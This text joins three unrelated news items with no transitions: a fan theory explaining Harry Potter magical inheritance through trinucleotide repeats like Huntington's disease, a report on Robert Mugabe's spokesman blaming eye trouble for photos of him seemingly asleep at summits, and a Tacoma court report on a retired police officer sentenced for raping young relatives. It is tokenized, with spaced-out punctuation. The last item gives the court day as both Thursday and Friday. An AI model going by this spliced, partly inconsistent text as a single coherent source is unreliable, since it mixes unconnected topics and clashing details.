I read your statement that the wizarding gene is dominant . I have heard criticism that this does not explain muggle-borns , squibs , or the steady inheritance pattern of magical abilities ; but I got your back . Magical ability could be explained by a single autosomal dominant gene if it is caused by an expansion of trinucleotide repeats with non-Mendelian ratios of inheritance . As we all know , DNA is made up of the nucleotide bases guanine , cytosine , adenine , and thymine . The sequences of these bases determine what products are transcribed . Trinucleotide repeats are one such possible sequence . Huntington 's disease is a well-known genetic condition . The Huntington 's Disease Collaborative Research Group ( 1993 ) proved that the disease was caused by CAG ( cytosine-adenine-guanine ) trinucleotide repeats . The Huntington gene is dominant and autosomal ( not linked to sex chromosomes ) . Normally , a person has 11 to 34 CAG repeats in the gene of interest , which causes the transcription of the normal huntingtin protein . Unfortunately , when an individual has 42 to over 66 CAG repeats , the abnormal huntingtin protein transcribed causes serious symptoms later in life . The huntingtin gene with an abnormal number of repeats shows dominant patterns of inheritance over the huntingtin gene containing a normal number of repeats . Let us postulate that the gene determining magical ability contains trinucleotide repeats .
Advertisement
She continues to present her argument for a dominant magic gene , but then shifts gears into other possibilities . Her preferred scenario for magical genetics ? That all magical ability stems from mutations to Muggle DNA . This leads into some interesting theories about so-called `` pure-blood '' families , whose blood might not be as Muggle-free as they suspected . Klenotiz also includes numerous resources to back up her theories , so that others may debate the finer points of the wizard genome .
I sent this paper to JK Rowling explaining how the wizarding gene could be singular , autosomal , and dominant ... [ Fus Ro Dah via It 's Okay to be Smart ]
The 93-year-old president of Zimbabwe is having eye problems . So says his spokesman , George Charamba , who tells local media that he feels “ very , very pained ” when he hears reports that Robert Mugabe , the world 's oldest head of state , is falling asleep during conferences .
“ At 93 , there is something that happens to the eyes and the president can not suffer bright lights If you look at his poise , he looks down , avoids direct lighting , ” Charamba reportedly told CapiTalk , a radio station in Harare , in an interview about Mugabe 's recent medical trip to Singapore .
According to the state-owned daily newspaper The Herald , the spokesman compared Mugabe 's condition to eye troubles suffered by Nelson Mandela . The former South African president was reported to have been highly sensitive to flashlight . “ In the case of Mandela , if you remember , you were not allowed to even use flashes whenever he was in the room , ” Charamba said . “ That is what happens at 93 , and Mandela , I do not think lived as long as the president did . Let us disabuse ourselves. ” Mandela died in 2013 at the age of 95 .
In any case , the photographic evidence that shows Mugabe sleeping through conferences in Africa and across the world are nothing new . Some date back more than a decade , to when Mugabe would have been in his early 80s .
Here he is closing his eyes during the Africa Union meeting in Sirte , Libya , in July 2005 .
Reuters/Radu Sigheti At the Africa Union meeting in Sirte , Libya , in July 2005 .
Later that year , he looked to be napping during the opening ceremony of the Africa-France summit in Bamako , Mali . ( To his left is Omar Bongo , then-president of Gabon , who also seems to have had trouble keeping his eyes open during the meeting . )
Reuters/Luc Gnago Bongo and Mugabe at the Africa-France summit in Bamako , Mali , in December 2005 .
Mugabe 's closed eyes continued to be a familiar sight to photographers in subsequent years .
AP Photo/Ariana Cubillos
AP Photo/Geert Vanden Wijngaert At a plenary session for the Africa-EU Summit in Tripoli , Libya , in November 2010 .
Mugabe 's recent health trips have been a source of concern in Zimbabwe , which is preparing for elections next year in which Mugabe is expected to run . Critics have questioned Mugabe 's fitness to rule the southern Africa nation , especially at a time when the country 's economy is in free-fall , with Zimbabweans desperate for cash sleeping outside banks . But Mugabe refutes the notion that his country is a fragile state , and refers to Zimbabwe as “ one of the most highly developed countries in Africa . ”
A A
TACOMA -- A retired police officer , who once toured grade schools with a talking motorcycle , was sentenced Thursday to more than 19 years in prison for child rape and other offenses involving young relatives .
Lee William Giles Jr. , 62 , and his girlfriend , Maureen Elizabeth Wear , 47 , pleaded guilty in November to first-degree child rape , second-degree child rape , first-degree child molestation and third-degree assault of a child .
Giles , who frequently visited schools and appeared on television and radio during a 30-year police career that ended in 2000 , was arrested in August 2006 after a young relative of Wear told authorities the officer had raped and molested him for years .
Detectives also wrote in court documents that they found videotapes showing Giles and Wear raping and molesting the boy , described as developmentally disabled , and molesting two girls related to Giles . The three ranged in age from 3 to 16 at the time of the abuse , according to the court filings .
Deputy Prosecutor John M. Sheeran said he agreed to the plea deal partly to spare the victims from having to testify in court .
`` There would have been a lot of graphic evidence introduced had the case gone to trial , '' Sheeran said . `` The victims ' families are supportive of this resolution . ''
In court on Friday , a boy Giles had molested asked his attorney to read his statement .
`` I also want to talk about the life sentence , the life sentence that I have . They 'll get a certain number of years . I will get a lifetime of trials and tribulations , '' the victim said in his staement .
The boy 's father also asked the attorney to read a statement on his behalf .
`` He ( my son ) dreams regularly that the defendants get out of jail and his is n't safe , or that they are hurting other children . He sleeps with a light on in his room , '' the father 's statement read .
As an officer , Giles appeared with Harvey , the talking motorcycle , in a grade school program designed to make police less scary and was involved in the TV program `` Behind the Shield . '' After retiring he became host of `` Crime Time '' on KLAY-AM radio .
There was no record of accusations of sexual misconduct by Giles while he was on the police force , officials said .
Sentencing for Wear was postponed .
